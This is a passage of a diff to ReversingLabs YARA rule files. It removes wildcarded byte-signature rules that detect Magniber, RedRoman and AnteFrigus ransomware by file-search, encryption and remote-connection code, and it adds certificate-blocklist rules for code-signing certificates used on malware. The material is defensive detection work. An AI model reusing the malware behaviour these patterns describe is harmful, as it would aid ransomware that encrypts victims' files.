-            80 FA ?? 74 ?? 80 FA ?? 74 ?? 80 FA ?? 74 ?? 8B C7 EB ?? 33 C0 40 0F B6 C0 2B CB 41
-            F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ??
-            ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56
-            FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ??
-            2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9
-            74 ?? 80 F9 ?? 75 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ??
-            ?? 85 C0 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B
-            C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4
-            ?? E9
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "04:a0:e9:2b:0b:9e:bb:b7:97:df:6e:f5:2b:d5:ad:05" and 1479081600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Magniber : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_25F222Ab2613Dc4270B2Aabc2519A101 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Magniber ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "07b6c938-aa25-5ff6-95d2-9e0f84c41b41"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "4458df2d-82c2-5377-9746-101c2de52913"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Magniber.yara#L1-L114"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "05b516f9b466489ea3a30e2fe5eb08290e85ece7a63e29e8bbbeb81c87d0a6f1"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16872-L16888"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2c6673f6821c4ba11fc015cf3e9edefeb7c45209bc9dcd18501c4681444a9b9e"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Magniber"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 55
-            ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF
-            15 ?? ?? ?? ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
-            8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 6A ?? 6A ?? 6A ?? 6A ??
-            8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 6A
-            ?? 8D 45 ?? 50 8D 4D ?? 51 68 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 83 7D ?? ??
-            74 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 33 C0 E9 ?? ?? ??
-            ?? 8B 55 ?? 83 C2 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D
-            ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 33 C0 EB ??
-            C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ??
-            ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15
-        }
-		$encrypt_files_1 = {
-            55 8B EC 83 EC ?? 56 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ??
-            ?? ?? ?? 89 45 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 8B 55 ?? 03 55 ?? 8D 44 12
-            ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? EB
-            ?? 8B 4D ?? 83 C1 ?? 89 4D ?? 8B 55 ?? 3B 55 ?? 7D ?? 8B 45 ?? 8B 4D ?? 8B 55 ?? 8B
-            75 ?? 66 8B 14 56 66 89 14 41 EB ?? B8 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 66 89 04 4A C7
-            45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 3B 4D ?? 7D ?? 8B 55 ??
-            03 55 ?? 8B 45 ?? 8B 4D ?? 8B 75 ?? 66 8B 0C 4E 66 89 4C 50 ?? EB ?? 8B 55 ?? 03 55
-            ?? 33 C0 8B 4D ?? 66 89 44 51 ?? 8D 55 ?? 52 8D 45 ?? 50 8D 4D ?? 51 8B 55 ?? 52 8B
-        }
-		$encrypt_files_2 = {
-            45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ??
-            ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83
-            7D ?? ?? 75 ?? 33 C0 E9 ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0
-            75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
-            6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84
-            ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45
-            ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 66 0F 57 C0 66 0F 13 45 ?? 6A ?? 8D 4D ?? 51 6A ??
-            8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 99 8B 4D ??
-            2B 4D ?? 8B 75 ?? 1B 75 ?? 89 45 ?? 89 55 ?? 89 4D ?? 89 75 ?? 8B 55 ?? 3B 55 ?? 7C
-            ?? 7F ?? 8B 45 ?? 3B 45 ?? 76 ?? 8B 4D ?? 2B 4D ?? 8B 55 ?? 1B 55 ?? 89 4D ?? 89 55
-            ?? EB ?? 8B 45 ?? 99 89 45 ?? 89 55 ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B
-        }
-		$encrypt_files_3 = {
-            45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 33 C0 E9 ?? ?? ?? ?? 83 7D ??
-            ?? 75 ?? E9 ?? ?? ?? ?? 8B 4D ?? 3B 4D ?? 73 ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 89 55
-            ?? 8B 45 ?? 50 8D 4D ?? 51 6A ?? 6A ?? 8B 55 ?? 52 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ??
-            ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 51 8D 55 ?? 52 8B 45 ?? 50 6A ?? 8B 4D ?? 51
-            6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45
-            ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? EB ??
-            E9 ?? ?? ?? ?? 8B 45 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 7D ?? ??
-            74 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ??
-            83 7D ?? ?? 74 ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? 51 8B 55 ?? 52 FF 15
-            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 3B 45 ?? 7C ?? 7F ?? 8B 4D ?? 3B 4D ??
-            76 ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ??
-            8B 4D ?? 51 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ??
-            83 C4 ?? B8 ?? ?? ?? ?? EB
-        }
-		$search_files = {
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 83 7D ?? ?? 7D ?? 8B 4D ?? 8B 94
-            8D ?? ?? ?? ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 33 C0 E9 ?? ?? ??
-            ?? EB ?? 8B 4D ?? 8B 55 ?? 8B 81 ?? ?? ?? ?? 3B 82 ?? ?? ?? ?? 76 ?? B8 ?? ?? ?? ??
-            E9 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 75 ?? B8 ??
-            ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ??
-            83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 50
-            FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8B 4D ?? 83 C1 ?? 51 FF 15 ?? ?? ?? ??
-            85 C0 75 ?? EB ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 83 C1
-            ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 85 C0 74 ?? 8B 4D ?? 81 79 ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ??
-            ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B 4D ??
-            81 79 ?? ?? ?? ?? ?? 75 ?? 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ??
-            ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 03 45 ?? 89
-            45 ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 8B 4D ?? 81 C1 ?? ?? ?? ?? 51 8B 55 ??
-            81 C2 ?? ?? ?? ?? 52 8B 45 ?? 05 ?? ?? ?? ?? 50 8B 4D ?? 81 C1 ?? ?? ?? ?? 51 8B 55
-            ?? 81 C2 ?? ?? ?? ?? 52 8B 45 ?? 05 ?? ?? ?? ?? 50 8B 4D ?? 81 C1 ?? ?? ?? ?? 51 8B
-            55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $search_files and ( all of ( $encrypt_files_* ) ) and $remote_connection )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aeroscan TOV" and pe.signatures [ i ] . serial == "25:f2:22:ab:26:13:dc:42:70:b2:aa:bc:25:19:a1:01" and 1445299200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Redroman : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_212Ca239866F88C3D5B000B3004A569C : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects RedRoman ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c860586a-fa50-5bb4-a3b4-13506f9d6030"
-		date = "2021-05-10"
-		modified = "2021-05-10"
+		id = "b433cddc-25c3-5627-99b5-ff9bc7fa73ed"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win64.Ransomware.RedRoman.yara#L1-L82"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6fb2ac0e7f7ac095766e27c057e5124406dc493c08d01a7e5381403d794c7240"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16890-L16906"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "23ab2343b17dce74fb4166a690ca5dd300b3ed20d3a6b43b922f456410d3035d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "RedRoman"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 84 24 ?? ??
-            ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ??
-            ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 4C 8D 8C 24 ?? ?? ?? ?? 41 B8 ?? ??
-            ?? ?? BA ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 C7 84
-            24 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 85 C0 75 ?? 33 D2 48 8B 8C 24 ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 8D 84 24 ?? ??
-            ?? ?? 48 89 44 24 ?? 41 B9 ?? ?? ?? ?? 45 33 C0 BA ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 6B C9 ?? 48 89 84 0C ?? ?? ?? ?? 48 C7 84 24
-            ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 85 C0 75 ?? B8 ?? ?? ?? ?? 48 6B C0 ?? 48 83 BC 04 ??
-            ?? ?? ?? ?? 74 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 84
-            24 ?? ?? ?? ?? EB ?? 33 D2 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ??
-            E9 ?? ?? ?? ?? 33 D2 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 49 ?? 48 89 01 48 8B 44 24 ?? 48 8B
-            40 ?? 48 83 38 ?? 75 ?? 48 8D 15 ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? B8 ?? ??
-            ?? ?? 48 6B C0 ?? 48 83 BC 04 ?? ?? ?? ?? ?? 74 ?? B8 ?? ?? ?? ?? 48 6B C0 ?? 48 8B
-            8C 04 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B8
-        }
-		$encrypt_files_p2 = {
-            4C 8D 05 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 48 8B 4D ?? 48 8B 55 ?? E8 ?? ?? ?? ?? 48 89
-            55 ?? 48 89 45 ?? EB ?? 31 C0 41 89 C0 48 8B 4D ?? 48 8B 55 ?? E8 ?? ?? ?? ?? 48 89
-            45 ?? EB ?? 48 8B 45 ?? 48 83 F8 ?? 74 ?? 48 8B 55 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? EB ?? EB ?? 48 81 C4 ?? ?? ?? ?? 5D C3 48 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 48 8B
-            85 ?? ?? ?? ?? 48 85 C0 74 ?? EB ?? EB ?? 0F 0B 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ??
-            ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ??
-            ?? ?? C6 85 ?? ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ??
-            ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ??
-            ?? ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ??
-            48 89 85 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ??
-            48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 85
-            C0 74 ?? EB ?? EB ?? 0F 0B 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ??
-            ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ??
-            ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ??
-            ?? ?? 48 89 85 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ??
-            48 8B 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 89 8D
-        }
-		$find_files = {
-            48 8D 9C 24 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 D9 31 D2 E8 ?? ?? ?? ?? 48 8B 0F 48
-            89 DA E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 4C 8D B4 24 ?? ?? ?? ?? 48 8D 9C 24 ??
-            ?? ?? ?? 66 83 BC 24 ?? ?? 00 00 ?? 74 ?? EB ?? 0F 1F 84 00 ?? ?? ?? ?? 48 8B 0F 48
-            89 DA E8 ?? ?? ?? ?? 85 C0 74 ?? 66 83 BC 24 ?? ?? 00 00 ?? 75 ?? 0F B7 84 24 ?? ??
-            ?? ?? 66 85 C0 74 ?? 66 83 F8 ?? 75 ?? 66 83 BC 24 ?? ?? 00 00 ?? 74 ?? 48 8B 47 ??
-            F0 48 83 00 ?? 0F 8E ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 41
-            B8 ?? ?? ?? ?? 4C 89 F1 E8 ?? ?? ?? ?? 48 C7 06 ?? ?? ?? ?? 48 8D 4E ?? 48 8D 94 24
-            ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 48
-            C7 06 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 48 C7 06 ?? ?? ?? ?? C6 46 ?? ?? 89 46 ?? 48
-            89 F0 0F 28 B5 ?? ?? ?? ?? 0F 28 BD ?? ?? ?? ?? 44 0F 28 85 ?? ?? ?? ?? 44 0F 28 8D
-            ?? ?? ?? ?? 44 0F 28 95 ?? ?? ?? ?? 44 0F 28 9D ?? ?? ?? ?? 44 0F 28 A5 ?? ?? ?? ??
-            44 0F 28 AD ?? ?? ?? ?? 44 0F 28 B5 ?? ?? ?? ?? 44 0F 28 BD ?? ?? ?? ?? 48 8D A5 ??
-            ?? ?? ?? 5B 5F 5E 41 5E 5D C3 0F 0B
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "XECURE LAB CO., LTD." and pe.signatures [ i ] . serial == "21:2c:a2:39:86:6f:88:c3:d5:b0:00:b3:00:4a:56:9c" and 1347840000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Antefrigus : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_18B700A319Aa98Ae71B279D4E8030B82 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects AnteFrigus ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "903ac92c-1a4a-5645-92db-d00b3bfd6ada"
-		date = "2021-03-05"
-		modified = "2021-03-05"
+		id = "8d1a98aa-a895-5e79-905c-760166352d4f"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.AnteFrigus.yara#L1-L210"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b84c01da0ee97a4eb8bf099c71094f994feb4c7185ad75b8b2ccda5eee283a92"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16908-L16924"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e201498acfd9afebc68321887a806bb5c1d74c64a7cd93530feae2a944bd30fa"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "AnteFrigus"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 68 ?? ?? ?? ?? 8B D0
-            89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 83 65 ?? ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? 8D 45
-            ?? 51 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 33 C0 8D 7D
-            ?? AB AB AB 33 C0 89 45 ?? 89 45 ?? 89 45 ?? C6 45 ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ??
-            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            68 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 59 8B D0 C6 45 ?? ?? 8B 4A ?? 8B 7A ?? 2B
-            CF 39 4E ?? 76 ?? 8B 46 ?? 2B 46 ?? 3B C7 72 ?? 83 7A ?? ?? 72 ?? 8B 12 57 52 51 8B
-            CE E8 ?? ?? ?? ?? EB ?? 56 8B CA E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 85 ??
-            ?? ?? ?? ?? 8D 45 ?? FF B5 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            83 7D ?? ?? 8D 4D ?? 8B 45 ?? 0F 43 4D ?? 8D 04 41 8D 4D ?? 0F 43 4D ?? 51 50 51 8D
-            4D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 83 65 ?? ?? 8D 4D ?? 83 65 ?? ?? 50 E8 ??
-            ?? ?? ?? C6 45 ?? ?? 8D 75 ?? 83 7D ?? ?? 8B 55 ?? 0F 43 75 ?? 85 D2 74 ?? 83 C9 ??
